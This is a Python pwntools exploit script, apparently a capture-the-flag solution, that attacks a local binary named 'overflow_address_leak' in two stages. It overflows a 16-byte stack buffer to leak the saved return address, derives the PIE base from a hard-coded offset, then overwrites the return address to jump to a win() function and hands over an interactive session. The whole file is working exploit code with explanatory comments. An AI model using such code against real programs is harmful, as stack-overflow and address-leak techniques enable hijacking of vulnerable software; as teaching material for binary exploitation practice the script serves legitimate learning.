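from pwn import *

FILENAME = './overflow_address_leak'
elf = ELF(FILENAME)
context.binary = elf

# Stack layout of the vulnerable frame as observed in this target:
# 0x10 bytes of buffer, then the 8-byte saved rbp, then the return address.
BUF_SIZE = 0x10
SAVED_RBP_SIZE = 8
# Distance from the PIE base to the return address that gets echoed back.
# This is tied to this exact build of the binary: recompute it
# (leak - elf.address under a debugger) whenever the target is rebuilt.
LEAK_OFFSET = 0x12ec
PAGE_MASK = 0xfff


def parse_leak(raw: bytes) -> int:
    """Turn the echoed tail of the buffer into a 64-bit little-endian address.

    The target echoes the buffer with a NUL-terminated print, so the leak
    stops at the first zero byte: we only receive the low, non-zero bytes
    of the saved return address and must zero-pad to 8 bytes ourselves.

    Raises ValueError when the tail cannot be a user-space pointer (empty,
    or longer than 8 bytes, i.e. the read swallowed more than the address).
    """
    if not raw or len(raw) > 8:
        raise ValueError(f'unexpected leak length {len(raw)}: {raw!r}')
    return int.from_bytes(raw.ljust(8, b'\x00'), 'little')


def run_once() -> None:
    """Run the two-stage exploit against one fresh process.

    Stage 1 overflows exactly up to the saved rbp so the echo leaks the
    return address, from which the PIE base is recovered.  Stage 2 repeats
    the overflow and overwrites the return address with win().

    Fails loudly (ValueError) when the leak does not look like a plausible
    address, instead of sending a garbage pointer and crashing the target.
    The process is closed on any failure; on success control is handed to
    the user via interactive().
    """
    p = process(FILENAME)
    try:
        # Stage 1: fill buffer + saved rbp; the return address is untouched.
        filler = b'a' * BUF_SIZE + b'c' * SAVED_RBP_SIZE
        p.recvuntil(b'dataz: ')
        p.send(filler)
        p.recvuntil(b'said: ')
        p.recvuntil(filler)
        # Everything between our filler and the newline is the return
        # address (little-endian, cut off at its zero high bytes).  Strip
        # only the newline: a bare rstrip() would also eat address bytes
        # that happen to be whitespace (0x09, 0x0d, 0x20, ...).
        raw = p.recvline().rstrip(b'\n')
        leak = parse_leak(raw)
        log.info(f'leaked return address: {leak:#x} ({len(raw)} bytes)')

        base = leak - LEAK_OFFSET
        # A PIE base is page aligned; anything else means LEAK_OFFSET is
        # stale or the echo was truncated (e.g. a 0x0a byte inside the
        # address ended recvline early).  Retry the run in that case.
        if base & PAGE_MASK:
            raise ValueError(f'implausible base {base:#x} from leak {leak:#x}')
        elf.address = base
        win = elf.symbols['win']
        log.info(f'base: {base:#x}  win: {win:#x}')

        # Stage 2: same filler, then the new return address -> win().
        p.recvuntil(b'dataz: ')
        p.send(filler + p64(win))
    except Exception:
        p.close()
        raise
    p.interactive()


if __name__ == '__main__':
    run_once()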